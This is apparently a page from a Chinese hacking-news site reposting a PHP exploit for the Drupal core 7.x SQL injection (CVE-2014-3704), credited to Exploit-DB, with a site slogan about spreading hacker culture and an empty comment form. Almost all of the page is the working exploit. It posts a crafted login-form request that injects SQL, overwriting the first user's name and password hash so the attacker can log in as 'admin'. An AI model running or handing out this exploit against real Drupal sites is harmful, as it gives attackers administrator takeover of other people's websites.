记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Drupal Core <= 7.32 - SQL Injection (PHP)

2014-10-17 19:55
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin Dörr #
# Software Link: http://www.drupal.com/ #
# Version: Drupal core 7.x versions prior to 7.32 #
# CVE: CVE-2014-3704 #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>



知识来源: www.exploit-db.com/exploits/34993

阅读:103283 | 评论:2 | 标签:webapps

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - Drupal Core <= 7.32 - SQL Injection (PHP)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云